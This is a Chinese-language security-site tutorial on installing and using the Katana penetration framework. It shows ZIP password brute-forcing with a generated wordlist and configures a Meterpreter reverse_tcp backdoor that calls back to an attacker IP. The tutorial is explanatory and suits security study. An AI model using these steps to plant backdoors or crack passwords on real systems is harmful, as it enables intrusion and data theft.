欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Katana Framework武士刀操作指南

来源:本站整理 作者:佚名 时间:2018-05-07 TAG: 我要投稿

Katana Framework是用Python语言写的渗透框架,但我更觉得它像是一个工具箱,作者是俄罗斯人,该工具集成以下功能:SQL注入、NMAP系统扫描探测、DNS欺骗,DNS伪装、MSF后门、字典生成、邮件炸弹、WHOIS、ARP投毒、对HTTP、SSH、RAR 、ZIP的暴力破解还有部分模块可以对ARP、无线接入点、LAN和WEB进行拒绝服务攻击。
PS:本文仅限于技术分享与讨论,严禁用于非法用途。
目前katana可以运行在以下的操作系统及分支。
系统分支
版本
支持
已经安装的依赖项目
状态
Kali Linux
4.4.0


可工作
Debian(8)
4.4.0


可工作
Parrot OS


可工作
Wifislax


可工作
OpenSuse


可工作
Arch Linux
4.8.6


可工作
Raspbian
4.1.7


可工作
Ubuntu
14.04


可工作
Xbuntu
4.4.0


可工作
安装和使用
首先我们使用git命令把它克隆到我们本地,这里我是用的是Centos7 x64
git clone https://github.com/PowerScript/KatanaFramework.git
要正常使用该工具我们还需要安装,等待脚本完成安装后,我们在命令行输入ktf.console就可以让它跑起来了。
cd KatanaFramework
chmod +x install
python install

其实这个工具跟meta很多特性都很相似,比如每次启动都会有不同的字符画,还有就是设置模块的关键字也是相同的

输入help可以查看该框架的帮助信息,show modules可以显示所有可用模块
show modules

比如我们生成一个字典并用来暴力破解Zip压缩文件(当然我们只是做个测试,如果密码复杂的话破解还是得靠运气的)使用use关键字加载一个模块
use mcs/gn.words
show options

我们保持参数默认,Run之后在我的home目录生成了一个7m左右的纯数字字典,之后我们载入fle/bt.zip模块


现在可以看到已经跑出了密码文件,但是在实际的破解中需要有一个非常强大的字典 。
我们再使用msf后门模块,生成一个后门试试

这里我把系统换成了kali,因为这个模块需要调用msfvenom命令,而Centos上安装的msfvenom生成后门一直出错,所以只能用咱们都懂的系统了,我们看到payload选项和encoders有大量的参数可供调用,大家可以根据自己需求填写,
使用set关键字设置参数,这里我把ip设置成攻击机,
set host 192.168.1.132
set encoder avoid_underscore_tolower
再设置一下编码
set payload windows/meterpreter/reverse_tcp设置成反向的shell
然后run生成后门文件,只不过msf的木马各大厂商都能识别了,没有好的免杀效果我就不在这里献丑了

由于它渗透能力比较弱,我还是觉得这更像个做测试工具包,我在这里就不11演示每个模块了,大家可以自己去探索。
 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载